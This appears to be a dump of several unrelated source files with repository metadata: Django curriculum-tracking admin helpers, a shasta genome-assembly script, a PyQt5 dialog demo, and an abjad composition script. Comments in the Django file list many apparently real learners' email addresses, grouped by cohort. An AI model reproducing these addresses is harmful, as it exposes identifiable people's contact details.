continue
available_flavours = project.content_item.available_flavours.all()
if default_flavour in available_flavours:
print(f"project: {project.id} {project}")
project.flavours.add(default_flavour)
def assign_flavours_to_user_by_email(email, default_flavour):
user = User.objects.get(email=email)
assign_flavours_to_user(user, default_flavour)
# curriculum_tracking//.py
# from curriculum_tracking.management.project_wragle_helpers import assign_flavours
# for o in l:
# if 'web' in o.cohort_curriculum.name:
# print(o)
# assign_flavours(o.id, javascript)
# if 'data' in o.cohort_curriculum.name:
# print(o)
# assign_flavours(o.id, python)
def remove_flavours(cohort_id):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
project.flavours.clear()
print(project)
print(project.flavours)
def export_project_flavours(cohort_id):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
all_projects = []
for user in users:
all_projects.extend(RecruitProject.objects.filter(recruit_users__in=[user]))
all_projects.sort(
key=lambda project: (
[o.id for o in project.recruit_users.all()],
project.content_item_id,
)
)
with open(f"gitignore/cohort_projects_{cohort_id}_{cohort.label}.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(
[
"project.id",
"content_item",
"repository.full_name",
"project.flavours",
"content_item.available_flavours",
]
)
for project in all_projects:
writer.writerow(
[
project.id,
project.content_item,
project.repository.full_name,
[o.name for o in project.flavours.all()],
[o.name for o in project.content_item.available_flavours.all()],
]
)
def if_one_flavour_available_then_assign(cohort_id=None):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
if project.flavours.count() > 0:
continue
if project.content_item.available_flavours.count() == 1:
flavour = project.content_item.available_flavours.first()
if flavour != none:
print(f"adding {flavour.name} to {project}")
project.flavours.add(flavour)
def change_project_flavour(project_id, to):
project = RecruitProject.objects.get(pk=project_id)
project.flavours.clear()
project.flavours.add(to)
def export_nosubmit_projects():
with open("gitignore/nosubmit_projects.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(
["project.id", "project.content_item_id", "project.content_item.title"]
)
for project in RecruitProject.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).order_by("content_item_id"):
writer.writerow(
[project.id, project.content_item_id, project.content_item.title]
)
def change_project_content_item_id(from_id, to_id):
print(f"from {ContentItem.objects.get(pk=from_id)}")
print(f"to {ContentItem.objects.get(pk=to_id)}")
for project in RecruitProject.objects.filter(content_item_id=from_id):
print(project.id)
project.content_item_id = to_id
project.save()
print()
def get_project_info(content_item_id, user_id):
user = User.objects.get(pk=user_id)
projects = RecruitProject.objects.filter(
content_item_id=content_item_id, recruit_users__in=[user]
)
if projects.count() < 2:
return
flavours = [
sorted([o.name for o in project.flavours.all()]) for project in projects
]
flavours = [",".join(l) for l in flavours]
if len(set(flavours)) == projects.count():
return
groups = UserGroup.objects.filter(users__in=[user])
cohorts = [o.cohort for o in RecruitCohort.objects.filter(user=user)]
content_item = ContentItem.objects.get(pk=content_item_id)
print(f"user = {user}")
print(f"groups = {groups}")
print(f"cohorts = {cohorts}")
print(f"content_item = {content_item}")
print(f"{projects.count()} matching projects:")
for project in projects:
print(f"Project: id={project.id} {project}")
print(f"\trepo: {project.repository.ssh_url}")
print(f"\tflavours: {[o.name for o in project.flavours.all()]}")
try:
print(f"\tcard: id={project.agile_card.id} {project.agile_card}")
except AgileCard.DoesNotExist:
print("\tno card")
print()
SQL_QUERY_TO_FETCH_POTENTIAL_DUPLICATE_PROJECTS = """
select count(*) ,curriculum_tracking_recruitproject.content_item_id,curriculum_tracking_recruitproject_recruit_users.user_id
into TEMPORARY temp
from curriculum_tracking_recruitproject, curriculum_tracking_recruitproject_recruit_users where curriculum_tracking_recruitproject_recruit_users.recruitproject_id = curriculum_tracking_recruitproject.id group by user_id,content_item_id;
select * from temp where count>1;
"""
def change_content_id(project_id, cid, flavour):
o = RecruitProject.objects.get(pk=project_id)
o.content_item_id = cid
o.save()
o.flavours.add(flavour)
def pproject(id):
proj = RecruitProject.objects.get(pk=id)
print(proj)
print(proj.repository)
def delete_nosubmit_instances():
AgileCard.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
CurriculumContentRequirement.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
RecruitProject.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
# assign_flavours_to_topic_progress(path="topics/angular-testing-cucumber" flavour="typescript,angular")
# assign_flavours_to_topic_progress(path="topics/angular-mocking" flavour="typescript,angular")
# assign_flavours_to_topic_progress(path="topics/ionic/introduction-to-ionic" flavour="typescript,angular,ionic")
# assign_flavours_to_topic_progress(path="topics/ionic/ionic-tools-and-patterns" flavour="typescript,angular,ionic")
# assign_flavours_to_topic_progress(path="topics/ionic/progressive-web-apps" flavour="typescript,angular,ionic")
# TODO!!!
# python manage.py delete_and_recreate_user_cards thanyani.tshikonwani@umuzi.org
# python manage.py delete_and_recreate_user_cards thotsana.mabotsa@umuzi.org
# python manage.py delete_and_recreate_user_cards ngwako.moshobane@umuzi.org
# unflavoured_progress = [<RecruitProject: Animals Part 2. Adding Tests - thanyani.tshikonwani@umuzi.org>]
# unflavoured_progress = [<RecruitProject: Animals Part 2. Adding Tests - thotsana.mabotsa@umuzi.org>]
# content_item_id = 225
# user_email = "thotsana.mabotsa@umuzi.org"
# user = User.objects.get(email=user_email)
# project = RecruitProject.objects.get(recruit_users__in=[user],content_item_id=content_item_id)
# project.repository.full_name
# # misc web devs
# # data scientists
# C19s -
# anda.pika@umuzi.org
# khanya.nelani@umuzi.org
# nkosinathi.siyeni@umuzi.org
# nuraan.barnes@umuzi.org
# thembela.selani@umuzi.org
# yanga.kanzi@umuzi.org
# C21s -
# andisiwe.nkwana@umuzi.org
# anttonert.maphosa@umuzi.org
# simon.zikhali@umuzi.org
def get_all_recruits_in_cohorts_with_matching_curriculum(curriculum_id):
ds_users = []
for cohort in Cohort.objects.filter(cohort_curriculum_id=2, active=True):
if cohort.cohort_number == 22:
continue
for o in RecruitCohort.objects.filter(cohort=cohort, user__active=True):
ds_users.append(o.user)
return ds_users
# ds_users = get_all_recruits_in_cohorts_with_matching_curriculum(2)
# for user in ds_users:
# print(user.email)
# web_users = get_all_recruits_in_cohorts_with_matching_curriculum(3)
# for user in web_users:
# print(user.email)
# d_eng_users = get_all_recruits_in_cohorts_with_matching_curriculum(4)
# for user in d_eng_users:
# print(user.email)
# DS
# ntokozo.mfene @ umuzi.org
# masai.mahapa @ umuzi.org
# phethehile.molefe @ umuzi.org
# puleng.moru @ umuzi.org
# boitshepo.masemola @ umuzi.org
# bokang.kama @ umuzi.org
# johan.khanye @ umuzi.org
# olebogeng.seribe @ umuzi.org
# phathu.ramakhanya @ umuzi.org
# singita.ngobeni @ umuzi.org
# themba.mbulwana @ umuzi.org
# wandile.nxumalo @ umuzi.org
# kevin.mntambo @ umuzi.org
# vhambelani.maelekano @ umuzi.org
# andy.nkumane @ umuzi.org
# milpontia.ngwenya @ umuzi.org
# dimpho.mashile @ umuzi.org
# hlobisile.mlebuka @ umuzi.org
# allen.mkandla @ umuzi.org
# joy.masemola @ umuzi.org
# mahnatse.choung @ umuzi.org
# mpho.khotleng @ umuzi.org
# shalom.mothapo @ umuzi.org
# sibusiso.fikizolo @ umuzi.org
# siphiwe.mahlangu @ umuzi.org
# mayika.thabo @ umuzi.org
# tshepo.rampai @ umuzi.org
# faith.mabule @ umuzi.org
# yanga.lusiti @ umuzi.org
# eric.maza @ umuzi.org
# khomotso.talane @ umuzi.org
# rethabile.thulo @ umuzi.org
# vuyile.magwaza @ umuzi.org
| [
"sheena.oconnell@gmail.com"
] | sheena.oconnell@gmail.com |
f11af8e0e76f04055392f05a6934c6acb8dbaa2d | 1c29f2609b0cb9a72972fb94e630ed8335b5e4e4 | /scripts/CreateAndCleanupMarkerGraph.py | 8dc351afb0b541ceef2db839c9f6120ead0bba6c | [
"MIT",
"Zlib",
"LicenseRef-scancode-public-domain"
] | permissive | tw7649116/shasta | 4bef2b878bca0adcb003902c619ab3f388b13498 | 8612d46fd3de5ed51d19f05c4d811b5736d516ad | refs/heads/master | 2020-04-28T02:44:06.973416 | 2019-03-06T19:35:49 | 2019-03-06T19:35:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | #!/usr/bin/python3
import shasta
import GetConfig
import sys
# Read the config file.
config = GetConfig.getConfig()
# Initialize the assembler and access what we need.
a = shasta.Assembler()
a.accessReadsReadOnly()
a.accessKmers()
a.accessMarkers()
a.accessAlignmentData()
a.accessReadGraph()
a.accessChimericReadsFlags()
# Create vertices of the marker graph.
a.createMarkerGraphVertices(
maxMarkerFrequency = int(config['Align']['maxMarkerFrequency']),
maxSkip = int(config['Align']['maxSkip']),
minCoverage = int(config['MarkerGraph']['minCoverage']),
maxCoverage = int(config['MarkerGraph']['maxCoverage']))
# Create edges of the marker graph.
a.createMarkerGraphEdges()
# Approximate transitive reduction.
a.flagMarkerGraphWeakEdges(
lowCoverageThreshold = int(config['MarkerGraph']['lowCoverageThreshold']),
highCoverageThreshold = int(config['MarkerGraph']['highCoverageThreshold']),
maxDistance = int(config['MarkerGraph']['maxDistance']),
)
# Prune the strong subgraph of the marker graph.
a.pruneMarkerGraphStrongSubgraph(
iterationCount = int(config['MarkerGraph']['pruneIterationCount']))
| [
"paoloczi@users.noreply.github.com"
] | paoloczi@users.noreply.github.com |
1c934fe5e03fbd7d00b58d1b16e4a2d2a0a5c435 | aca253ff1a97c96a1a0a9a5802aa623789662bb1 | /p030/dialog_demo.py | e568b7f233a493e3aef167358b74b2a0a0b09abf | [] | no_license | KD-huhu/PyQt5 | a6128a34b93f6e2da7216d5818f66dc9614216bc | 1c33a6549c2fcf663168256553d8c24e25d9a69c | refs/heads/master | 2022-07-03T07:37:29.837547 | 2020-05-17T14:54:39 | 2020-05-17T14:54:39 | 261,768,854 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class QDialogDemo(QMainWindow):
    """Main window with one button that pops up a modal QDialog."""
    def __init__(self):
        super(QDialogDemo,self).__init__()
        self.initUI()
    def initUI(self):
        # Basic window setup; the visible strings are user-facing and left as-is.
        self.setWindowTitle('QDialog案例')
        self.resize(300,200)
        self.button = QPushButton(self)
        self.button.setText('弹出对话框')
        self.button.move(50,50)
        self.button.clicked.connect(self.showDialog)
    def showDialog(self):
        dialog = QDialog()  # create the dialog object
        button = QPushButton('确定',dialog)  # add an "OK" button to the dialog
        button.clicked.connect(dialog.close)
        button.move(50,50)
        dialog.setWindowTitle('对话框')  # dialog basics are configured like the main window
        dialog.setWindowModality(Qt.ApplicationModal)  # while the dialog is open, the main window's widgets are unusable
        dialog.exec()
if __name__ == '__main__':
    # Standard PyQt bootstrap: create the app, show the window, run the event loop.
    app = QApplication(sys.argv)
    main = QDialogDemo()
    main.show()
    sys.exit(app.exec_())
| [
"noreply@github.com"
] | KD-huhu.noreply@github.com |
13507a4833cf69a71115ace06a6eff6d13129eb8 | a054b81a3abfd612ee89ad4b6a536fa6ccf63da1 | /GUERRERO_Paper/timespans/Section_B.py | 2bfa308a1c16de18c907f2a56c86cd5695b3f837 | [] | no_license | GregoryREvans/GUERRERO_Analysis_Paper | 60ea5824980f803217a8080ba5a1e8dff8f11a12 | 0fd45edc36498b4e2c8a47617fb797493ef25af0 | refs/heads/master | 2020-05-19T10:22:45.889642 | 2019-05-05T03:05:46 | 2019-05-05T03:05:46 | 184,969,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150,578 | py | import abjad
import itertools
import os
import pathlib
import time
import abjadext.rmakers
from MusicMaker import MusicMaker
from AttachmentHandler import AttachmentHandler
from random import random
from random import seed
from evans.general_tools.random_walk import randomWalk
from evans.general_tools.rotate import rotate
from evans.general_tools.mirror import mirror
from evans.abjad_functions.talea_timespan.timespan_functions import make_showable_list as make_showable_list
print('Interpreting file ...')
# Define the time signatures we would like to apply against the timespan structure.
time_signatures = [
    abjad.TimeSignature(pair) for pair in [
        (4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
        (4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
        (4, 4), (4, 4), (4, 4),
        # (4, 4), (4, 4), (4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
        # (4, 4), (4, 4), (4, 4), (4, 4), (7, 8),
    ]
]
# Cumulative measure durations: the offset at which each measure boundary
# falls, used against the timespan structure described above.
bounds = abjad.mathtools.cumulative_sums([_.duration for _ in time_signatures])
#Define Pitch Material
def cyc(lst):
    """Generator that walks *lst* forever, wrapping around at the end."""
    for idx in itertools.count():
        yield lst[idx % len(lst)]
def grouper(lst1, lst2):
    """Regroup an endless repetition of *lst1* into the shapes given by *lst2*.

    Each entry of *lst2* is a group size: size 1 contributes a bare item,
    any other size contributes a sub-list of that many consecutive items.
    """
    def endless(seq):
        # Same wrap-around indexing the module-level cyc() uses.
        for idx in itertools.count():
            yield seq[idx % len(seq)]

    feed = endless(lst1)
    grouped = []
    for size in lst2:
        if size == 1:
            grouped.append(next(feed))
        else:
            grouped.append([next(feed) for _ in range(size)])
    return grouped
def reduceMod(list_length, rw):
    """Wrap each walk value of *rw* into the index range [0, list_length)."""
    wrapped = []
    for step in rw:
        wrapped.append(step % list_length)
    return wrapped
# Per-instrument pitch material in numbered-pitch notation (fractional values
# are quarter-tones). Most entries pair a chord (inner list) with one single
# pitch -- presumably [multiphonic, fundamental]; confirm against the score.
# -3 at bottom of chord for completion
sopranino_chord = [27, ]
soprano_1_chord = [[13.25, 16, 26.25, ], 22,]
soprano_2_chord = [[13, 14.75, 26.25, ], 16,] #maybe it's 13.25?
soprano_3_chord = [[12.75, 15.5, 26, ], 13,]
alto_1_chord = [[12.5, 19, 27.75, 34, ], 20,]
alto_2_chord = [[12.5, 15.25, 25.5, ], 12,]
alto_3_chord = [[1.75, 13.5, 22.25, 27, 30, ], 1,]
alto_4_chord = [[12.5, 15.25, 25.5, ], 20,]
alto_5_chord = [[1.75, 13.5, 22.25, 27, 30, ], 12,]
alto_6_chord = [[12.5, 19, 27.75, 34, ], 1,]
tenor_1_chord = [[6, 17.5, ], 17,]
tenor_2_chord = [[6, 17.5, 25.5, 30, ], 6,]
tenor_3_chord = [[6, 17.5, 25.5, 30.75, ], -1]
tenor_4_chord = [[6, 17.5, ], 17,]
tenor_5_chord = [[6, 17.5, 25.5, 30.75, ], 6,]
baritone_1_chord = [[13.25, 27.5, 33.75, ], 13,]
baritone_2_chord = [[4, 16.5, 23.5, ], 6,]
baritone_3_chord = [[7.75, 17.75, 25.5, 34, ], 4,]
bass_1_chord = [11, ]
bass_2_chord = [9, ]
contrabass_chord = [-2, 2, 7, -2, 2, 7, 2, -2]
# NOTE(review): byte-equivalent duplicate of the reduceMod defined earlier in
# this file (only the first parameter is named differently); this redefinition
# shadows the first.  One of the two should eventually be removed.
def reduceMod(x, rw):
    # Map every value in *rw* into the range [0, x) via modulo.
    return [(y % x) for y in rw]
# Pitch lattice in half-integer steps: -1, -0.5, 0, 0.5, ..., 29, 29.5.
# (Single comprehension replaces the original append-twice loop; each integer
# base contributes itself and its half-step neighbor, in ascending order.)
walk_list = [value for base in range(-1, 30) for value in (base, base + 0.5)]
mirrored_walk_list = mirror(walk_list, sequential_duplicates=False)

def _random_walk_material(rotation, seed):
    """Return ``(rotated_chord, walk_notes)`` for one voice.

    Every voice walks the same mirrored half-step lattice, distinguished only
    by where the lattice is rotated to start (*rotation*) and by its own
    random *seed*.  The walk is 1000 single-steps over the rotated lattice.

    This factory replaces 21 copy-pasted rotate/randomWalk stanzas from the
    original; the (rotation, seed) pairs below are transcribed verbatim.
    """
    chord = rotate(mirrored_walk_list, rotation)
    notes = list(randomWalk(
        random_seed=seed,
        length=1000,
        step_list=[1],
        mapped_list=chord,
    ))
    return chord, notes

sopranino_walk_chord, sopranino_random_walk_notes = _random_walk_material(56, 1)
soprano_1_walk_chord, soprano_1_random_walk_notes = _random_walk_material(46, 2)
soprano_2_walk_chord, soprano_2_random_walk_notes = _random_walk_material(34, 3)
soprano_3_walk_chord, soprano_3_random_walk_notes = _random_walk_material(28, 4)
alto_1_walk_chord, alto_1_random_walk_notes = _random_walk_material(42, 5)
alto_2_walk_chord, alto_2_random_walk_notes = _random_walk_material(26, 6)
alto_3_walk_chord, alto_3_random_walk_notes = _random_walk_material(4, 7)
alto_4_walk_chord, alto_4_random_walk_notes = _random_walk_material(42, 8)
alto_5_walk_chord, alto_5_random_walk_notes = _random_walk_material(26, 9)
alto_6_walk_chord, alto_6_random_walk_notes = _random_walk_material(4, 10)
tenor_1_walk_chord, tenor_1_random_walk_notes = _random_walk_material(36, 11)
tenor_2_walk_chord, tenor_2_random_walk_notes = _random_walk_material(14, 12)
tenor_3_walk_chord, tenor_3_random_walk_notes = _random_walk_material(0, 13)
tenor_4_walk_chord, tenor_4_random_walk_notes = _random_walk_material(36, 14)
tenor_5_walk_chord, tenor_5_random_walk_notes = _random_walk_material(14, 15)
baritone_1_walk_chord, baritone_1_random_walk_notes = _random_walk_material(28, 16)
baritone_2_walk_chord, baritone_2_random_walk_notes = _random_walk_material(14, 17)
baritone_3_walk_chord, baritone_3_random_walk_notes = _random_walk_material(10, 18)
bass_1_walk_chord, bass_1_random_walk_notes = _random_walk_material(24, 19)
bass_2_walk_chord, bass_2_random_walk_notes = _random_walk_material(20, 20)
contrabass_walk_chord, contrabass_random_walk_notes = _random_walk_material(6, 21)
# Define rhythm-makers: two to be used by the MusicMaker, one for silence.
# rmaker_one: plain notes, one per division (paired with the chord pitches).
rmaker_one = abjadext.rmakers.NoteRhythmMaker()
# rmaker_two: talea-driven rhythms in sixteenths (paired with the random walks).
rmaker_two = abjadext.rmakers.TaleaRhythmMaker(
    talea=abjadext.rmakers.Talea(
        counts=[1, 1, 1, 1, 1, 2, 2, 1, 2, 1, 3, 2, 2, 3, 2, 1, 1, 2, 1, 1, 1, 3, ],
        denominator=16,
    ),
    beam_specifier=abjadext.rmakers.BeamSpecifier(
        beam_divisions_together=True,
        beam_rests=False,
    ),
    # Alternately shrink/grow divisions by a sixteenth to create tuplets.
    extra_counts_per_division=[-1, 0, 1, -1, 1, 0, ],
    # burnish_specifier=abjadext.rmakers.BurnishSpecifier(
    #     left_classes=[abjad.Note, abjad.Rest],
    #     left_counts=[1, 0, 1],
    #     ),
    # NOTE(review): silence([8], 5) and abjad.index([2], 11) follow abjad's
    # (indices, period) pattern convention -- confirm the intended
    # periodicity against the abjad-ext-rmakers documentation.
    logical_tie_masks=[
        abjadext.rmakers.silence([8], 5),
    ],
    division_masks=[
        abjadext.rmakers.SilenceMask(
            pattern=abjad.index([2], 11),
        ),
    ],
    # Clean up the resulting notation: unwrap trivial tuplets and rewrite
    # rest-filled / sustained tuplets.
    tuplet_specifier=abjadext.rmakers.TupletSpecifier(
        trivialize=True,
        extract_trivial=True,
        rewrite_rest_filled=True,
        rewrite_sustained=True,
    ),
)
# Initialize AttachmentHandlers: dynamic envelopes applied by the MusicMakers.
# Handler one: crescendo mp -> f.
attachment_handler_one = AttachmentHandler(
    starting_dynamic='mp',
    ending_dynamic='f',
    hairpin='<',
    # articulation_list=['tenuto'],
)
# Handler two: diminuendo mf -> pp.
attachment_handler_two = AttachmentHandler(
    starting_dynamic='mf',
    ending_dynamic='pp',
    hairpin='>',
    # articulation_list=['tenuto'],
)
# Initialize MusicMakers with the rhythm-makers.
# Every voice gets the same three-maker kit, so the original's 21 copied
# stanzas collapse into one factory:
#   one   -- sustained chord pitches on rmaker_one, crescendo dynamics
#   two   -- random-walk pitches on rmaker_two, crescendo dynamics
#   three -- random-walk pitches on rmaker_two, diminuendo dynamics
def _musicmaker_kit(chord_pitches, walk_pitches):
    """Return the (one, two, three) MusicMaker triple for a single voice."""
    return (
        MusicMaker(
            rmaker=rmaker_one,
            pitches=chord_pitches,
            continuous=True,
            attachment_handler=attachment_handler_one,
        ),
        MusicMaker(
            rmaker=rmaker_two,
            pitches=walk_pitches,
            continuous=True,
            attachment_handler=attachment_handler_one,
        ),
        MusicMaker(
            rmaker=rmaker_two,
            pitches=walk_pitches,
            continuous=True,
            attachment_handler=attachment_handler_two,
        ),
    )

# NOTE(review): in the original, altos 1-3 walk with the soprano 1-3
# random-walk notes (their own alto_1/2/3_random_walk_notes go unused).
# That wiring is preserved verbatim below -- confirm it is intentional
# rather than a copy-paste slip.
(sopranino_musicmaker_one, sopranino_musicmaker_two,
 sopranino_musicmaker_three) = _musicmaker_kit(
    sopranino_chord, sopranino_random_walk_notes)
(soprano_one_musicmaker_one, soprano_one_musicmaker_two,
 soprano_one_musicmaker_three) = _musicmaker_kit(
    soprano_1_chord, soprano_1_random_walk_notes)
(soprano_two_musicmaker_one, soprano_two_musicmaker_two,
 soprano_two_musicmaker_three) = _musicmaker_kit(
    soprano_2_chord, soprano_2_random_walk_notes)
(soprano_three_musicmaker_one, soprano_three_musicmaker_two,
 soprano_three_musicmaker_three) = _musicmaker_kit(
    soprano_3_chord, soprano_3_random_walk_notes)
(alto_one_musicmaker_one, alto_one_musicmaker_two,
 alto_one_musicmaker_three) = _musicmaker_kit(
    alto_1_chord, soprano_1_random_walk_notes)
(alto_two_musicmaker_one, alto_two_musicmaker_two,
 alto_two_musicmaker_three) = _musicmaker_kit(
    alto_2_chord, soprano_2_random_walk_notes)
(alto_three_musicmaker_one, alto_three_musicmaker_two,
 alto_three_musicmaker_three) = _musicmaker_kit(
    alto_3_chord, soprano_3_random_walk_notes)
(alto_four_musicmaker_one, alto_four_musicmaker_two,
 alto_four_musicmaker_three) = _musicmaker_kit(
    alto_4_chord, alto_4_random_walk_notes)
(alto_five_musicmaker_one, alto_five_musicmaker_two,
 alto_five_musicmaker_three) = _musicmaker_kit(
    alto_5_chord, alto_5_random_walk_notes)
(alto_six_musicmaker_one, alto_six_musicmaker_two,
 alto_six_musicmaker_three) = _musicmaker_kit(
    alto_6_chord, alto_6_random_walk_notes)
(tenor_one_musicmaker_one, tenor_one_musicmaker_two,
 tenor_one_musicmaker_three) = _musicmaker_kit(
    tenor_1_chord, tenor_1_random_walk_notes)
(tenor_two_musicmaker_one, tenor_two_musicmaker_two,
 tenor_two_musicmaker_three) = _musicmaker_kit(
    tenor_2_chord, tenor_2_random_walk_notes)
(tenor_three_musicmaker_one, tenor_three_musicmaker_two,
 tenor_three_musicmaker_three) = _musicmaker_kit(
    tenor_3_chord, tenor_3_random_walk_notes)
(tenor_four_musicmaker_one, tenor_four_musicmaker_two,
 tenor_four_musicmaker_three) = _musicmaker_kit(
    tenor_4_chord, tenor_4_random_walk_notes)
(tenor_five_musicmaker_one, tenor_five_musicmaker_two,
 tenor_five_musicmaker_three) = _musicmaker_kit(
    tenor_5_chord, tenor_5_random_walk_notes)
(baritone_one_musicmaker_one, baritone_one_musicmaker_two,
 baritone_one_musicmaker_three) = _musicmaker_kit(
    baritone_1_chord, baritone_1_random_walk_notes)
(baritone_two_musicmaker_one, baritone_two_musicmaker_two,
 baritone_two_musicmaker_three) = _musicmaker_kit(
    baritone_2_chord, baritone_2_random_walk_notes)
(baritone_three_musicmaker_one, baritone_three_musicmaker_two,
 baritone_three_musicmaker_three) = _musicmaker_kit(
    baritone_3_chord, baritone_3_random_walk_notes)
(bass_one_musicmaker_one, bass_one_musicmaker_two,
 bass_one_musicmaker_three) = _musicmaker_kit(
    bass_1_chord, bass_1_random_walk_notes)
(bass_two_musicmaker_one, bass_two_musicmaker_two,
 bass_two_musicmaker_three) = _musicmaker_kit(
    bass_2_chord, bass_2_random_walk_notes)
(contrabass_musicmaker_one, contrabass_musicmaker_two,
 contrabass_musicmaker_three) = _musicmaker_kit(
    contrabass_chord, contrabass_random_walk_notes)
# Rhythm-maker that renders divisions as silence.
silence_maker = abjadext.rmakers.NoteRhythmMaker(
    division_masks=[
        abjadext.rmakers.SilenceMask(
            # abjad.index([0], 1): indices [0] with period 1, i.e. every
            # division is matched, so the maker produces only rests.
            pattern=abjad.index([0], 1),
        ),
    ],
)
# Define a small class so that we can annotate timespans with additional
# information:
class MusicSpecifier:
    """Annotation payload pairing a MusicMaker with its target voice name.

    Instances are attached to ``abjad.AnnotatedTimespan`` objects so that
    each timespan records which maker renders it and into which voice.
    """

    def __init__(self, music_maker, voice_name):
        self.music_maker = music_maker
        self.voice_name = voice_name

    def __repr__(self):
        # Debug-friendly representation (the default object repr hides both
        # fields, which makes timespan dumps hard to read).
        return (
            f'{type(self).__name__}('
            f'music_maker={self.music_maker!r}, '
            f'voice_name={self.voice_name!r})'
        )
# Define an initial timespan structure, annotated with music specifiers. This
# structure has not been split along meter boundaries. This structure does not
# contain timespans explicitly representing silence. Here I make four, one
# for each voice, using Python's list comprehension syntax to save some
# space.
print('Collecting timespans and rmakers ...')
# Voice 1 (sopranino): 52 consecutive timespans, each 2/8 wide, covering
# 0/8 through 104/8.  The original spelled every timespan out literally;
# since only the maker choice varies per span, it is encoded as a pattern
# string transcribed verbatim from the original:
#   '2' -> sopranino_musicmaker_two   (random walk, crescendo)
#   '3' -> sopranino_musicmaker_three (random walk, diminuendo)
# NOTE: the original's commented-out continuation (spans 104/8-199/8,
# ending with a silence_maker span) was removed; recover it from version
# control if the piece is extended.
_voice_1_pattern = (
    '2322322232'
    '2223222233'
    '2223332233'
    '3223323323'
    '333222233332'
)
voice_1_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=(2 * index, 8),
        stop_offset=(2 * index + 2, 8),
        annotation=MusicSpecifier(
            music_maker=(
                sopranino_musicmaker_two if symbol == '2'
                else sopranino_musicmaker_three
            ),
            voice_name='Voice 1',
        ),
    )
    for index, symbol in enumerate(_voice_1_pattern)
])
# Voice 2 (soprano one): 52 consecutive 2/8-wide timespans over 0/8-104/8,
# maker choice per span encoded as a pattern string transcribed verbatim
# from the original:
#   '2' -> soprano_one_musicmaker_two   (random walk, crescendo)
#   '3' -> soprano_one_musicmaker_three (random walk, diminuendo)
# NOTE: the original's commented-out continuation (spans 104/8-199/8) was
# removed; recover it from version control if the piece is extended.
_voice_2_pattern = (
    '2222232333'
    '2333222223'
    '3332222333'
    '2333222233'
    '322322233322'
)
voice_2_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=(2 * index, 8),
        stop_offset=(2 * index + 2, 8),
        annotation=MusicSpecifier(
            music_maker=(
                soprano_one_musicmaker_two if symbol == '2'
                else soprano_one_musicmaker_three
            ),
            voice_name='Voice 2',
        ),
    )
    for index, symbol in enumerate(_voice_2_pattern)
])
# Voice 3 (soprano two): 52 consecutive 2/8-wide timespans over 0/8-104/8,
# maker choice per span encoded as a pattern string transcribed verbatim
# from the original:
#   '2' -> soprano_two_musicmaker_two   (random walk, crescendo)
#   '3' -> soprano_two_musicmaker_three (random walk, diminuendo)
# NOTE: the original's commented-out continuation (spans 104/8-199/8) was
# removed; recover it from version control if the piece is extended.
_voice_3_pattern = (
    '3322332323'
    '2233233332'
    '3223233232'
    '3233232233'
    '322223333222'
)
voice_3_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=(2 * index, 8),
        stop_offset=(2 * index + 2, 8),
        annotation=MusicSpecifier(
            music_maker=(
                soprano_two_musicmaker_two if symbol == '2'
                else soprano_two_musicmaker_three
            ),
            voice_name='Voice 3',
        ),
    )
    for index, symbol in enumerate(_voice_3_pattern)
])
# Timespans for Voice 4: one annotated two-bar (2/8-duration) span per entry,
# covering offsets 0/8 through 104/8, each tagged with the music-maker that
# generates that span's material. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): the Voice 4 <-> "soprano three" pairing is
# inferred from variable names only — verify against the score setup.
voice_4_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 4',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), soprano_three_musicmaker_three],
        [(2, 8), (4, 8), soprano_three_musicmaker_two],
        [(4, 8), (6, 8), soprano_three_musicmaker_two],
        [(6, 8), (8, 8), soprano_three_musicmaker_two],
        [(8, 8), (10, 8), soprano_three_musicmaker_three],
        [(10, 8), (12, 8), soprano_three_musicmaker_three],
        [(12, 8), (14, 8), soprano_three_musicmaker_three],
        [(14, 8), (16, 8), soprano_three_musicmaker_three],
        [(16, 8), (18, 8), soprano_three_musicmaker_two],
        [(18, 8), (20, 8), soprano_three_musicmaker_two],
        [(20, 8), (22, 8), soprano_three_musicmaker_two],
        [(22, 8), (24, 8), soprano_three_musicmaker_two],
        [(24, 8), (26, 8), soprano_three_musicmaker_two],
        [(26, 8), (28, 8), soprano_three_musicmaker_three],
        [(28, 8), (30, 8), soprano_three_musicmaker_two],
        [(30, 8), (32, 8), soprano_three_musicmaker_three],
        [(32, 8), (34, 8), soprano_three_musicmaker_three],
        [(34, 8), (36, 8), soprano_three_musicmaker_two],
        [(36, 8), (38, 8), soprano_three_musicmaker_two],
        [(38, 8), (40, 8), soprano_three_musicmaker_three],
        [(40, 8), (42, 8), soprano_three_musicmaker_three],
        [(42, 8), (44, 8), soprano_three_musicmaker_three],
        [(44, 8), (46, 8), soprano_three_musicmaker_two],
        [(46, 8), (48, 8), soprano_three_musicmaker_two],
